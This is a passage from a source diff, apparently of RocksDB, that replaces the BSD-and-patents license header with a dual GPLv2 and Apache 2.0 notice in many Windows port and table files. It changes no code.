--- a/port/win/env_win.cc
+++ b/port/win/env_win.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/port/win/env_win.h b/port/win/env_win.h
index 0b42b5e6d3b..ce1a61d4161 100644
--- a/port/win/env_win.h
+++ b/port/win/env_win.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
 // found in the LICENSE file. See the AUTHORS file for names of contributors.
diff --git a/port/win/io_win.cc b/port/win/io_win.cc
index 621d01f3068..3d2533a2efe 100644
--- a/port/win/io_win.cc
+++ b/port/win/io_win.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/port/win/io_win.h b/port/win/io_win.h
index e050593ef3e..2c1d5a1ea9e 100644
--- a/port/win/io_win.h
+++ b/port/win/io_win.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/port/win/port_win.cc b/port/win/port_win.cc
index c03a4526fb0..e5d5a44d6c7 100644
--- a/port/win/port_win.cc
+++ b/port/win/port_win.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/port/win/port_win.h b/port/win/port_win.h
index e72a208ac36..bbc5feec31b 100644
--- a/port/win/port_win.h
+++ b/port/win/port_win.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/port/win/win_logger.cc b/port/win/win_logger.cc
index a037ba48692..0bace9f31f8 100644
--- a/port/win/win_logger.cc
+++ b/port/win/win_logger.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/port/win/win_logger.h b/port/win/win_logger.h
index fddf1d1bf54..2d44f506d1a 100644
--- a/port/win/win_logger.h
+++ b/port/win/win_logger.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/port/win/win_thread.cc b/port/win/win_thread.cc
index 9c71d376a8b..e55ca7450b1 100644
--- a/port/win/win_thread.cc
+++ b/port/win/win_thread.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/port/win/win_thread.h b/port/win/win_thread.h
index 1d78a2f0827..993cc027316 100644
--- a/port/win/win_thread.h
+++ b/port/win/win_thread.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/port/win/xpress_win.cc b/port/win/xpress_win.cc
index 344a42cda60..e16ca986491 100644
--- a/port/win/xpress_win.cc
+++ b/port/win/xpress_win.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/port/win/xpress_win.h b/port/win/xpress_win.h
index c8325b10fff..5b11e7da9c6 100644
--- a/port/win/xpress_win.h
+++ b/port/win/xpress_win.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/port/xpress.h b/port/xpress.h
index 523245ca8e4..457025f666e 100644
--- a/port/xpress.h
+++ b/port/xpress.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/block.cc b/table/block.cc
index 2d40c3fcede..372bbd2f0b5 100644
--- a/table/block.cc
+++ b/table/block.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/block.h b/table/block.h
index 5ebbaeda0f7..044e076626d 100644
--- a/table/block.h
+++ b/table/block.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/block_based_filter_block.cc b/table/block_based_filter_block.cc
index 3c164d50ad6..697c11a42f0 100644
--- a/table/block_based_filter_block.cc
+++ b/table/block_based_filter_block.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2012 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/block_based_filter_block.h b/table/block_based_filter_block.h
index c1984355954..52b79fea501 100644
--- a/table/block_based_filter_block.h
+++ b/table/block_based_filter_block.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2012 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/block_based_filter_block_test.cc b/table/block_based_filter_block_test.cc
index 24d3a7685fa..f666ba25242 100644
--- a/table/block_based_filter_block_test.cc
+++ b/table/block_based_filter_block_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2012 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/block_based_table_builder.cc b/table/block_based_table_builder.cc
index 47da7ef2c78..e87def73e7e 100644
--- a/table/block_based_table_builder.cc
+++ b/table/block_based_table_builder.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/block_based_table_builder.h b/table/block_based_table_builder.h
index 3b351443acd..2e860627107 100644
--- a/table/block_based_table_builder.h
+++ b/table/block_based_table_builder.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/block_based_table_factory.cc b/table/block_based_table_factory.cc
index 18525147be3..4705046bfeb 100644
--- a/table/block_based_table_factory.cc
+++ b/table/block_based_table_factory.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/block_based_table_factory.h b/table/block_based_table_factory.h
index 276d3d63522..bdff00d1ee3 100644
--- a/table/block_based_table_factory.h
+++ b/table/block_based_table_factory.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/block_based_table_reader.cc b/table/block_based_table_reader.cc
index 67a79e94093..123e1814ab7 100644
--- a/table/block_based_table_reader.cc
+++ b/table/block_based_table_reader.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/block_based_table_reader.h b/table/block_based_table_reader.h
index b9e900ac836..857ea56057b 100644
--- a/table/block_based_table_reader.h
+++ b/table/block_based_table_reader.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/block_builder.cc b/table/block_builder.cc
index 8db4ab2adb4..39bfffe5118 100644
--- a/table/block_builder.cc
+++ b/table/block_builder.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/block_builder.h b/table/block_builder.h
index 10ec74651a5..6b5297d0410 100644
--- a/table/block_builder.h
+++ b/table/block_builder.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/block_prefix_index.cc b/table/block_prefix_index.cc
index 10fcb057548..df37b5fc2b3 100644
--- a/table/block_prefix_index.cc
+++ b/table/block_prefix_index.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 
 #include "table/block_prefix_index.h"
 
diff --git a/table/block_prefix_index.h b/table/block_prefix_index.h
index d9c3b97e0a0..dd4282d17b8 100644
--- a/table/block_prefix_index.h
+++ b/table/block_prefix_index.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 
 #pragma once
 #include
diff --git a/table/block_test.cc b/table/block_test.cc
index bcc2d69e32f..f5c543975f4 100644
--- a/table/block_test.cc
+++ b/table/block_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #include
 #include
diff --git a/table/bloom_block.cc b/table/bloom_block.cc
index b496b3c2f98..61959030a22 100644
--- a/table/bloom_block.cc
+++ b/table/bloom_block.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 
 #include "table/bloom_block.h"
 
diff --git a/table/bloom_block.h b/table/bloom_block.h
index 40cef7b7188..9ff610badd4 100644
--- a/table/bloom_block.h
+++ b/table/bloom_block.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 
 #pragma once
 #include
diff --git a/table/cleanable_test.cc b/table/cleanable_test.cc
index 6a17d8a302f..f18c33b8399 100644
--- a/table/cleanable_test.cc
+++ b/table/cleanable_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include
diff --git a/table/cuckoo_table_builder.cc b/table/cuckoo_table_builder.cc
index 457b2ef826a..e3ed314b36f 100644
--- a/table/cuckoo_table_builder.cc
+++ b/table/cuckoo_table_builder.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
 #include "table/cuckoo_table_builder.h"
diff --git a/table/cuckoo_table_builder.h b/table/cuckoo_table_builder.h
index 47b95394216..3829541b39a 100644
--- a/table/cuckoo_table_builder.h
+++ b/table/cuckoo_table_builder.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #ifndef ROCKSDB_LITE
diff --git a/table/cuckoo_table_builder_test.cc b/table/cuckoo_table_builder_test.cc
index ad0d6570226..ec282b4b540 100644
--- a/table/cuckoo_table_builder_test.cc
+++ b/table/cuckoo_table_builder_test.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/table/cuckoo_table_factory.cc b/table/cuckoo_table_factory.cc
index 87107ee7fc3..2325bcf77c4 100644
--- a/table/cuckoo_table_factory.cc
+++ b/table/cuckoo_table_factory.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
 #include "table/cuckoo_table_factory.h"
diff --git a/table/cuckoo_table_factory.h b/table/cuckoo_table_factory.h
index acf0da9d338..774dc3c3e80 100644
--- a/table/cuckoo_table_factory.h
+++ b/table/cuckoo_table_factory.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #ifndef ROCKSDB_LITE
diff --git a/table/cuckoo_table_reader.cc b/table/cuckoo_table_reader.cc
index 7a886229bb3..85670ad1daf 100644
--- a/table/cuckoo_table_reader.cc
+++ b/table/cuckoo_table_reader.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/cuckoo_table_reader.h b/table/cuckoo_table_reader.h
index 7241a7f05cb..f2b6d1a9cfe 100644
--- a/table/cuckoo_table_reader.h
+++ b/table/cuckoo_table_reader.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/cuckoo_table_reader_test.cc b/table/cuckoo_table_reader_test.cc
index e01417ea98b..7e131e56e31 100644
--- a/table/cuckoo_table_reader_test.cc
+++ b/table/cuckoo_table_reader_test.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/table/filter_block.h b/table/filter_block.h
index 57528e286c1..94136f659e1 100644
--- a/table/filter_block.h
+++ b/table/filter_block.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2012 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/flush_block_policy.cc b/table/flush_block_policy.cc
index f5757c6e72c..9a8dea4cb0c 100644
--- a/table/flush_block_policy.cc
+++ b/table/flush_block_policy.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "rocksdb/options.h"
 #include "rocksdb/flush_block_policy.h"
diff --git a/table/format.cc b/table/format.cc
index 1ae45f18554..3e5a191bbf2 100644
